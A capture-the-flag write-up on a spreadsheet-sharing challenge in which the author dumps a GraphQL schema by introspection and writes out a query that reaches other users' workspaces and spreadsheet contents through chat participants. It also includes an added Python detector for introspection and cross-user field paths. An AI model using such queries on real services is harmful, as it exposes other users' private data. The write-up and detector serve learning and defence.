The challenge seems like a platform where we can create our own workspace and share our spreadsheets with others. I tried to use the existing space and create a sample spreadsheet to play around.


Niceee! I can even edit each cell and row in the spreadsheet too! As always, I’m questioning myself: ‘What’s happening behind the scenes?’ Therefore, I started to intercept the requests and found something.

Dang! I can see the GraphQL query directly in the request body. This must be some sort of GraphQL injection. I started to dump the whole schema using IntrospectionQuery from the request.
Thanks to this blog, I was able to learn quickly about GraphQL injection since this is my first time doing it xD.
https://hg8.sh/posts/misc-ctf/graphql-injection/
Yep! I got the whole objects and schemas. Let’s dump the JSON response into https://apis.guru/graphql-voyager/ to get better readability and visibility.

I can see there are a bunch of schemas and columns like flag and spreadsheets that I need to dump. Let’s try using the InQL extension in Burp Suite to get some boilerplate.

Seems like I can use the userChats query to dump all spreadsheet contents of the users in the chats. I started to construct my own payload based on the boilerplate and the map from earlier, and came up with the one below.
query userChats {
  userChats {
    id
    messages {
      chat {
        id
        participants {
          id
        }
        messages {
          id
        }
      }
      id
      sender {
        id
      }
      timestamp
    }
    participants {
      email
      id
      username
      workspaces {
        id
        name
        spreadsheets {
          flag
          cells {
            content
          }
        }
      }
    }
  }
}
Formatted:
{"query":"query userChats {\n userChats {\n id\n messages {\n chat {id participants {id} messages {id}}\n id\n sender{id}\n timestamp\n }\n participants {\n email\n id\n username\n workspaces{id, name, spreadsheets {flag, cells{content}}}\n }\n }\n}"}
Send the payload in Repeater, and the flag shows up in the content of one of the users’ spreadsheets.
Flag: H7Tex{t3n4nt_h0pp1ng_v1a_l34ky_4p1s+aef7b25bbc98e4ce}
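
From the defender's side, the request above can be caught before it reaches the resolvers. The following is an added example (not part of the original writeup or the challenge's code): it extracts the field paths from the request body shown above and flags introspection as well as any selection that reaches workspaces through participants. The deny rule and the function names are assumptions made for illustration, and the check complements resolver-level authorization rather than replacing it.

```python
import json
import re

# Request body copied from the writeup above.
BODY = r'''{"query":"query userChats {\n userChats {\n id\n messages {\n chat {id participants {id} messages {id}}\n id\n sender{id}\n timestamp\n }\n participants {\n email\n id\n username\n workspaces{id, name, spreadsheets {flag, cells{content}}}\n }\n }\n}"}'''

# Assumed policy (not from the challenge): fields of another user that must
# not be selectable through a chat participant.
DENIED_UNDER_PARTICIPANTS = {"workspaces"}
INTROSPECTION = {"__schema", "__type"}


def field_paths(query):
    """Dotted path of every leaf field; plain selection sets only
    (no arguments, aliases, fragments or directives)."""
    tokens = re.findall(r"[{}]|[_A-Za-z][_0-9A-Za-z]*", query)
    tokens = tokens[tokens.index("{") + 1:]  # skip the "query <name>" header
    paths, stack, last = [], [], None
    for tok in tokens:
        if tok != "{" and last:  # previous name had no sub-selection: a leaf
            paths.append(".".join(stack + [last]))
        if tok == "{":
            stack.append(last or "")
            last = None
        elif tok == "}":
            last = None
            if stack:
                stack.pop()
        else:
            last = tok
    return paths


def violations(body):
    """Return (reason, path) pairs for one JSON request body."""
    found = []
    for path in field_paths(json.loads(body)["query"]):
        parts = path.split(".")
        if INTROSPECTION & set(parts):
            found.append(("introspection", path))
        if "participants" in parts[:-1]:
            child = parts[parts.index("participants") + 1]
            if child in DENIED_UNDER_PARTICIPANTS:
                found.append(("cross-user field", path))
    return found


if __name__ == "__main__":
    for reason, path in violations(BODY):
        print(f"{reason}: {path}")
```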